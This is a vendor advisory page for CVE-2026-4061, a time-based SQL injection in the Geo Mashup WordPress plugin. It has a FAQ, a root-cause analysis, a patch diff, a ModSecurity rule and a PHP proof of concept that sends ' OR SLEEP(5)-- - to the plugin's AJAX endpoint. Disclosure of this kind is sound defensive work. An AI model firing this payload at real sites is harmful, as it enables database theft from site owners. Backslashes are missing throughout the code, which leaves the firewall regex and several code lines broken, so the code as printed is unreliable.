What is CVE-2026-4061?

CVE-2026-4061 is a high-severity vulnerability in the Geo Mashup WordPress plugin, affecting versions up to and including 1.13.18. It allows unauthenticated attackers to exploit a time-based SQL injection via the ‘map_post_type’ parameter, potentially extracting sensitive information from the database.

How does the vulnerability work?

The vulnerability arises from inadequate sanitization of the ‘map_post_type’ parameter in SQL queries. Attackers can send crafted requests that include SQL payloads, allowing them to execute arbitrary SQL commands and extract data from the database using time-based blind injection techniques.

Who is affected by this vulnerability?

Any WordPress site using the Geo Mashup plugin version 1.13.18 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under ‘Plugins’ to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the Geo Mashup plugin. If it is version 1.13.18 or earlier, your site is at risk. Additionally, ensure that the Geo Search feature is enabled in the plugin settings.

What should I do to fix this vulnerability?

To fix the vulnerability, update the Geo Mashup plugin to version 1.13.19 or later, where the issue has been patched. Regularly check for updates to all plugins to maintain security.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality, integrity, and availability of the affected systems. It suggests that exploitation could lead to serious consequences, such as unauthorized access to sensitive data.

What is time-based blind SQL injection?

Time-based blind SQL injection is a technique where an attacker determines the existence of certain data in the database by measuring the time it takes for the server to respond to specific queries. By injecting payloads that cause delays, attackers can infer information based on response times.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable AJAX endpoint with a malicious ‘map_post_type’ parameter. By observing the server’s response time, the attacker can confirm the presence of data in the database, demonstrating the exploitation technique.

Is there a way to mitigate the risk if I cannot update immediately?

If an immediate update is not possible, consider disabling the Geo Search feature in the plugin settings to mitigate the risk of exploitation. Regularly monitor your site for suspicious activity and consider implementing a web application firewall (WAF) for additional protection.

What is the role of the 'map_post_type' parameter in this vulnerability?

The ‘map_post_type’ parameter is used in SQL queries within the Geo Mashup plugin. Its lack of proper sanitization allows attackers to inject malicious SQL code, which is the core of the vulnerability, enabling unauthorized access to the database.

How can I stay informed about similar vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and regularly check the National Vulnerability Database (NVD) or CVE details. Additionally, consider using security plugins that provide alerts for known vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-4061: Geo Mashup <= 1.13.18 – Unauthenticated Time-Based SQL Injection via 'map_post_type' Parameter (geo-mashup)

Q: What are the potential consequences of exploitation?

If exploited, this vulnerability could allow an attacker to execute arbitrary SQL queries, leading to the extraction of sensitive information such as user credentials and private data. This could result in data breaches and significant harm to the affected organization.

CVE ID CVE-2026-4061

Plugin geo-mashup

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.13.18

Patched Version 1.13.19

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4061: This vulnerability is an unauthenticated time-based SQL injection in the Geo Mashup WordPress plugin, affecting versions up to and including 1.13.18. The flaw resides in the `GeoMashupDB::location_query()` function within `geo-mashup-db.php`. The CVSS score is 7.5 (High). An attacker can extract sensitive data from the database by sending crafted requests to the Geo Search AJAX endpoint.

The root cause is inadequate sanitization of the `map_post_type` parameter in the `GeoMashupDB::location_query()` function. The code in `geo-mashup-db.php` at lines 1745-1748 splits the parameter by commas and directly concatenates the values into an SQL `IN(…)` clause using `join()`. The `any` branch (lines 1734-1737) correctly escapes values with `array_map(‘esc_sql’, …)`, but the else branch does not. Additionally, the `SearchResults` hook in the Search feature calls `stripslashes_deep($_POST)` before the data reaches `location_query()`, which removes WordPress’s protective magic quotes and leaves the input unsanitized.

Exploitation requires the Geo Search feature to be enabled in the plugin settings. An attacker sends a POST request to the AJAX handler with the action `geo_mashup_search_results`. The vulnerable `map_post_type` parameter is passed via the request. An attacker can inject a time-based SQL payload like `’ OR SLEEP(5)– -` into this parameter. The plugin concatenates this payload into the SQL query, causing the database to pause for the specified duration. By observing response delays, an attacker can extract data character by character using blind SQL injection techniques.

The patch in version 1.13.19 modifies the `else` branch of the `map_post_type` handling in `geo-mashup-db.php` to also apply `array_map(‘esc_sql’, …)` to the value array before concatenation. It also adds `sanitize_key()` for the `map_post_type` parameter in the `sanitize_query_arg()` function. The attached `geo-query.php` diff shows a related change: the patched version passes `$_REQUEST` to `GeoMashup::get_locations_json()` but removes the sanitize call, which is compensated by the new `sanitize_query_args()` call added at line 1635 of `geo-mashup-db.php`. Before the patch, unsanitized input flowed directly into SQL. After the patch, all values are properly escaped.

Successful exploitation allows an unauthenticated attacker to execute arbitrary SQL queries against the WordPress database. This can lead to the extraction of sensitive information such as user credentials (hashed passwords), authentication tokens, and other private post or user data stored in the database. Time-based blind injection can be automated to systematically dump the entire database. The confidentiality impact is high, with a CVSS confidentiality score of 6.0.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/geo-mashup/geo-mashup-db.php
+++ b/geo-mashup/geo-mashup-db.php
@@ -1495,6 +1495,7 @@
 	 * @param string $name
 	 */
 	public static function sanitize_query_arg( &$value, $name ) {
+		if (is_null($value)) return;
 		switch ($name) {
 			case 'minlat':
 			case 'maxlat':
@@ -1507,7 +1508,6 @@
 				$value = (float) $value;
 				break;

-			case 'map_cat':
 			case 'object_ids':
 			case 'exclude_object_ids':
 				$value = preg_replace( '/[^0-9,]/', '', $value );
@@ -1515,6 +1515,8 @@

 			case 'map_post_type':
 			case 'object_name':
+			case 'map_cat':
+			case 'show_future':
 				$value = sanitize_key( $value );
 				break;

@@ -1528,10 +1530,6 @@
 				$value = (bool) $value;
 				break;

-			case 'show_future':
-				$value = sanitize_key( $value );
-				break;
-
 			case 'sort':
 				$value = self::sanitize_sort_arg( $value );
 				break;
@@ -1635,6 +1633,7 @@
 			'map_offset' => 0,
 		);
 		$query_args = wp_parse_args( $query_args, $default_args );
+		$query_args = self::sanitize_query_args( $query_args );

 		// Construct the query
 		$object_name = $query_args['object_name'];
@@ -1745,18 +1744,23 @@
 			} else {
 				if ( !is_array( $query_args['map_post_type'] ) )
 					$query_args['map_post_type'] = preg_split( '/[,s]+/', $query_args['map_post_type'] );
-				$wheres[] = "o.post_type IN ('" . join("', '", $query_args['map_post_type']) . "')";
+				$wheres[] = "o.post_type IN ('" . join("', '", array_map( 'esc_sql', $query_args['map_post_type'] ) ) . "')";
 			}
 		}

 		if ( ! empty( $query_args['object_id'] ) ) {
-			$wheres[] = 'gmlr.object_id = ' . esc_sql( $query_args['object_id'] );
+			$wheres[] = $wpdb->prepare('gmlr.object_id = %d', absint( $query_args['object_id' ]));
 		} else if ( ! empty( $query_args['object_ids'] ) ) {
-			$wheres[] = 'gmlr.object_id IN ( ' . esc_sql( $query_args['object_ids'] ) .' )';
+			$ids = array_map( 'absint', explode( ',', $query_args['object_ids'] ) );
+    		$placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
+    		$wheres[] = $wpdb->prepare( "gmlr.object_id IN ( $placeholders )", $ids );
 		}

-		if ( ! empty( $query_args['exclude_object_ids'] ) )
-			$wheres[] = 'gmlr.object_id NOT IN ( ' . esc_sql( $query_args['exclude_object_ids'] ) . ' )';
+		if ( ! empty( $query_args['exclude_object_ids'] ) ) {
+			$ids = array_map( 'absint', explode( ',', $query_args['exclude_object_ids'] ) );
+    		$placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
+			$wheres[] = $wpdb->prepare( "gmlr.object_id NOT IN ( $placeholders )", $ids );
+		}

 		list( $l_cols, $l_join, $l_where, $l_groupby ) = $location_query->get_sql( 'o', $object_store['id_column'] );
 		$field_string .= $l_cols;
--- a/geo-mashup/geo-mashup-options.php
+++ b/geo-mashup/geo-mashup-options.php
@@ -448,7 +448,7 @@
 						__(', which must be a string', 'GeoMashup') );
 					return false;
 				}
-				if ( preg_match( "/<.*>/", $value ) ) {
+				if ( preg_match( "/</?[a-z][a-z0-9]*/i", $value ) ) {
 					array_push ( $this->validation_errors, '"'. esc_html( $value ) . '" ' . __('is invalid for', 'GeoMashup') . ' ' . $key .
 						__(', which must not contain XML tags.', 'GeoMashup') );
 					return false;
--- a/geo-mashup/geo-mashup.php
+++ b/geo-mashup/geo-mashup.php
@@ -3,7 +3,7 @@
 Plugin Name: Geo Mashup
 Plugin URI: https://wordpress.org/plugins/geo-mashup/
 Description: Save location for posts and pages, or even users and comments. Display these locations on Google, Leaflet, and OSM maps. Make WordPress into your GeoCMS.
-Version: 1.13.18
+Version: 1.13.19
 Author: Dylan Kuhn
 Text Domain: GeoMashup
 Domain Path: /lang
@@ -256,7 +256,7 @@
 		define('GEO_MASHUP_DIRECTORY', dirname( GEO_MASHUP_PLUGIN_NAME ) );
 		define('GEO_MASHUP_URL_PATH', trim( plugin_dir_url( __FILE__ ), '/' ) );
 		define('GEO_MASHUP_MAX_ZOOM', 20);
-		define('GEO_MASHUP_VERSION', '1.13.18');
+		define('GEO_MASHUP_VERSION', '1.13.19');
 		define('GEO_MASHUP_DB_VERSION', '1.3');
 	}

@@ -1113,6 +1113,9 @@
 	 */
 	private static function click_to_load_content( $map_data, $iframe_src, $click_to_load_text, $static, $map_image ) {

+		$iframe_src = esc_attr( $iframe_src );
+		$click_to_load_text = esc_html( $click_to_load_text );
+
 		if ( is_feed() ) {
 			return "<a href="{$iframe_src}">$click_to_load_text</a>";
 		}
@@ -1621,6 +1624,8 @@
 		);
 		$args = wp_parse_args( $args, $defaults );
 		extract( $args, EXTR_SKIP );
+		$separator = esc_html( $separator );
+		$format = esc_html( $format );
 		$info = '';

 		if ( $object_name && $object_id ) {
--- a/geo-mashup/geo-query.php
+++ b/geo-mashup/geo-query.php
@@ -269,7 +269,7 @@
 		header('Cache-Control: no-cache;', true);
 		header('Expires: -1;', true);

-		$json = GeoMashup::get_locations_json( GeoMashupDB::sanitize_query_args( $_REQUEST ) );
+		$json = GeoMashup::get_locations_json( $_REQUEST );
 		if ( isset( $_REQUEST['callback'] ) )
 			$json = esc_js( $_REQUEST['callback'] ) . '(' . $json . ')';
 		echo $json;
--- a/geo-mashup/php/Admin/Settings/OptionsPage.php
+++ b/geo-mashup/php/Admin/Settings/OptionsPage.php
@@ -86,6 +86,10 @@

 		check_admin_referer( 'geo-mashup-update-options' );

+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_die( 'Not Authorized' );
+		}
+
 		// Make missing array options empty
 		if ( empty( $submission['global_map']['add_map_type_control'] ) ) {
 			$submission['global_map']['add_map_type_control'] = array();
--- a/geo-mashup/php/Search.php
+++ b/geo-mashup/php/Search.php
@@ -174,19 +174,18 @@
 	public function load_template( $template = 'search-results' ) {

 		// Define variables for the template
-		/** @var $object_name */
-		/** @var $object_ids */
-		/** @var $units */
-		/** @var $location_text */
-		/** @var $radius */
-		/** @var $sort */
-		extract( $this->query_vars, EXTR_OVERWRITE );
+	 	$object_name = isset($this->query_vars['object_name']) ? $this->query_vars['object_name'] : null;
+	 	$distance_factor = isset($this->query_vars['distance_factor']) ? $this->query_vars['distance_factor'] : null;
+	 	$units = isset($this->query_vars['units']) ? $this->query_vars['units'] : null;
+	 	$location_text = isset($this->query_vars['location_text']) ? $this->query_vars['location_text'] : null;
+	 	$radius = isset($this->query_vars['radius']) ? $this->query_vars['radius'] : null;
+	 	$sort = isset($this->query_vars['sort']) ? $this->query_vars['sort'] : null;

 		extract( [
-			'search_text'       => $location_text,
+			'search_text'       => esc_html( $location_text ),
 			'distance_factor'   => $this->distance_factor,
 			'near_location'     => $this->near_location,
-			'result_count'      => $this->result_count,
+			'result_count'      => (int) $this->result_count,
 			'geo_mashup_search' => &$this,
 			'approximate_zoom'  => absint( log( 10000 / $this->max_km, 2 ) )
 		], EXTR_OVERWRITE );
--- a/geo-mashup/vendor/composer/installed.php
+++ b/geo-mashup/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'cyberhobo/wordpress-geo-mashup',
-        'pretty_version' => '1.13.18',
-        'version' => '1.13.18.0',
-        'reference' => '9305999a20b89e7ac45e070acf55cb709112103d',
+        'pretty_version' => '1.13.19',
+        'version' => '1.13.19.0',
+        'reference' => 'dc9a83950897592ee664acc7dea71600e68ea932',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'cyberhobo/wordpress-geo-mashup' => array(
-            'pretty_version' => '1.13.18',
-            'version' => '1.13.18.0',
-            'reference' => '9305999a20b89e7ac45e070acf55cb709112103d',
+            'pretty_version' => '1.13.19',
+            'version' => '1.13.19.0',
+            'reference' => 'dc9a83950897592ee664acc7dea71600e68ea932',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4061
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-4061 - Geo Mashup SQL Injection via map_post_type',severity:'CRITICAL',tag:'CVE-2026-4061'"
SecRule ARGS_POST:action "@streq geo_mashup_search_results" "chain"
SecRule ARGS_POST:map_post_type "@rx (?i)(borb|bunionb|bsleepb|bbenchmarkb|bwaitforb|bdelayb|select)" "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4061 - Geo Mashup <= 1.13.18 - Unauthenticated Time-Based SQL Injection via 'map_post_type' Parameter

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change this to the target WordPress site
$action = 'geo_mashup_search_results'; // The AJAX action for Geo Search

// Step 1: Test if the Geo Search feature is enabled by sending a benign request
$benign_payload = array(
    'action' => $action,
    'map_post_type' => 'post',
    'object_name' => ''
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($benign_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "Step 1: Testing benign request...n";
echo "HTTP Code: $http_coden";
echo "Response: " . substr($response, 0, 200) . "nn";

// Step 2: Send a time-based SQL injection payload to verify vulnerability
// If the database sleeps for 5 seconds, the request will take longer than the timeout
$sqli_payload = array(
    'action' => $action,
    'map_post_type' => "' OR SLEEP(5)-- -",
    'object_name' => ''
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($sqli_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Wait up to 15 seconds for the sleep
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$elapsed = $end_time - $start_time;
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "Step 2: Testing SQL injection payload (SLEEP(5))...n";
echo "HTTP Code: $http_coden";
echo "Elapsed Time: $elapsed secondsn";
if ($elapsed > 4.5) {
    echo "VULNERABILITY CONFIRMED: Time-based SQL injection detected.n";
} else {
    echo "Vulnerability NOT confirmed. The response was too fast.n";
}
echo "Response: " . substr($response, 0, 200) . "n";

Frequently Asked Questions

What is CVE-2026-4061?
Overview of the vulnerability
CVE-2026-4061 is a high-severity vulnerability in the Geo Mashup WordPress plugin, affecting versions up to and including 1.13.18. It allows unauthenticated attackers to exploit a time-based SQL injection via the ‘map_post_type’ parameter, potentially extracting sensitive information from the database.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from inadequate sanitization of the ‘map_post_type’ parameter in SQL queries. Attackers can send crafted requests that include SQL payloads, allowing them to execute arbitrary SQL commands and extract data from the database using time-based blind injection techniques.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Geo Mashup plugin version 1.13.18 or earlier is affected. Administrators can check their plugin version in the WordPress dashboard under ‘Plugins’ to determine if they are at risk.
How can I check if my site is vulnerable?
Steps to assess vulnerability
To check if your site is vulnerable, verify the installed version of the Geo Mashup plugin. If it is version 1.13.18 or earlier, your site is at risk. Additionally, ensure that the Geo Search feature is enabled in the plugin settings.
What should I do to fix this vulnerability?
Mitigation steps
To fix the vulnerability, update the Geo Mashup plugin to version 1.13.19 or later, where the issue has been patched. Regularly check for updates to all plugins to maintain security.
What does the CVSS score of 7.5 indicate?
Understanding severity levels
A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality, integrity, and availability of the affected systems. It suggests that exploitation could lead to serious consequences, such as unauthorized access to sensitive data.
What is time-based blind SQL injection?
Explanation of the attack method
Time-based blind SQL injection is a technique where an attacker determines the existence of certain data in the database by measuring the time it takes for the server to respond to specific queries. By injecting payloads that cause delays, attackers can infer information based on response times.
How does the proof of concept demonstrate the vulnerability?
Understanding the provided proof of concept
The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable AJAX endpoint with a malicious ‘map_post_type’ parameter. By observing the server’s response time, the attacker can confirm the presence of data in the database, demonstrating the exploitation technique.
What are the potential consequences of exploitation?
Risks associated with the vulnerability
If exploited, this vulnerability could allow an attacker to execute arbitrary SQL queries, leading to the extraction of sensitive information such as user credentials and private data. This could result in data breaches and significant harm to the affected organization.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary risk reduction measures
If an immediate update is not possible, consider disabling the Geo Search feature in the plugin settings to mitigate the risk of exploitation. Regularly monitor your site for suspicious activity and consider implementing a web application firewall (WAF) for additional protection.
What is the role of the 'map_post_type' parameter in this vulnerability?
Key parameter involved in the attack
The ‘map_post_type’ parameter is used in SQL queries within the Geo Mashup plugin. Its lack of proper sanitization allows attackers to inject malicious SQL code, which is the core of the vulnerability, enabling unauthorized access to the database.
How can I stay informed about similar vulnerabilities?
Best practices for security awareness
To stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and regularly check the National Vulnerability Database (NVD) or CVE details. Additionally, consider using security plugins that provide alerts for known vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations